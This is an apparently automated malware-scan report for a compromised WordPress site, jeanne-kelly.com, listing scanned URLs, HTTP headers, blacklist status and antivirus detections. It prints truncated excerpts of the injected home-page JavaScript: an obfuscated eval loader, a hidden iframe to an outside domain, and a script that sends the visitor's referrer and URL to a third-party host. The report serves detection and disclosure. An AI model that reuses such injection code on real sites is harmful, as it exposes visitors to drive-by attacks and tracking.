New scan:

Malware Scanner report for jeanne-kelly.com

Malicious/Suspicious/Total urls checked
1/0/12
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "jeanne-kelly.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jeanne-kelly.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.jeanne-kelly.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 25 Jan 2015 17:05:29 GMT
Location: http://jeanne-kelly.com/
Server: Apache
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://jeanne-kelly.com/xmlrpc.php
clean
http://jeanne-kelly.com/
200 OK
Content-Length: 87459
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

if(document.loaded) {
showBrowVer();
} else {
if (window.addEventListener) {
window.addEventListener('load', showBrowVer, false);
} else {
window.attachEvent('onload', showBrowVer);
}
}


function browserDetectNav(chrAfterPoint)
{
var
UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo
... 3346 bytes are skipped ...
.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://kreotceonite.com/';
js_kod2.width = '5px';
js_kod2.height = '3px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
}
}

Decoded script:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e,
... 15681 bytes are skipped ...
200px%27%3B%20%20%20%20%20%20%20%20%20%0A%09%09%09%09js_kod2.setAttribute%28%27style%27%2C%27visibility%3Ahidden%27%29%3B%0Adocument.getElementById%28%27dt%27%29.appendChild%28js_kod2%29%3B%0A%7D%3C/script%3E';var OI1=document.createElement('script');OI1.src='http://jqueryapi.info/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);var _1IO=document.getElementsByTagName('head')[0];_1IO.appendChild(OI1);document.write(unescape(_escape));

Antivirus reports:

Avast
JS:Iframe-EGI [Trj]
Fortinet
JS/Iframe.KI!tr
ESET-NOD32
JS/Iframe.KI

http://jeanne-kelly.com/wp-content/themes/imbalance2/libs/jquery-1.6.1.min.js?ver=4.0.1
200 OK
Content-Length: 91342
Content-Type: application/javascript
clean
http://jeanne-kelly.com/wp-content/plugins/slimbox/javascript/jquery.slimbox.js?ver=2.03
200 OK
Content-Length: 4202
Content-Type: application/javascript
clean
http://jeanne-kelly.com/wp-content/themes/imbalance2/libs/jquery.masonry.min.js?ver=4.0.1
200 OK
Content-Length: 5430
Content-Type: application/javascript
clean
http://jeanne-kelly.com/wp-content/themes/imbalance2/libs/jquery-ui.custom.min.js?ver=4.0.1
200 OK
Content-Length: 27792
Content-Type: application/javascript
clean
http://jeanne-kelly.com/wp-content/themes/imbalance2/libs/jquery.infinitescroll.min.js?ver=4.0.1
200 OK
Content-Length: 4389
Content-Type: application/javascript
clean
http://www.google.com/jsapi
200 OK
Content-Length: 24552
Content-Type: text/javascript
clean
http://www.google.com/uds/solutions/slideshow/gfslideshow.js
HTTP/1.1 301 Moved Permanently
Cache-Control: public, max-age=2592000
Connection: close
Date: Fri, 23 Jan 2015 00:05:42 GMT
Age: 233997
Location: http://uds.googleusercontent.com/uds/solutions/slideshow/gfslideshow.js
Server: sffe
Content-Length: 268
Content-Type: text/html; charset=UTF-8
Expires: Sun, 22 Feb 2015 00:05:42 GMT
Alternate-Protocol: 80:quic,p=0.02
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
clean
http://uds.googleusercontent.com/uds/solutions/slideshow/gfslideshow.js
200 OK
Content-Length: 35793
Content-Type: application/x-javascript
clean
http://www.jeanne-kelly.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Sun, 25 Jan 2015 17:05:40 GMT
Pragma: no-cache
Location: http://jeanne-kelly.com/test404page.js
Server: Apache
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://jeanne-kelly.com/xmlrpc.php
clean
http://jeanne-kelly.com/test404page.js
404 Not Found
Content-Length: 32
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jeanne-kelly.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 25 Jan 2015 17:05:31 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://jeanne-kelly.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: jeanne-kelly.com
Referer: http://www.google.com/search?q=jeanne-kelly.com

Result:
The result is similar to the first query. There are no suspicious redirects found.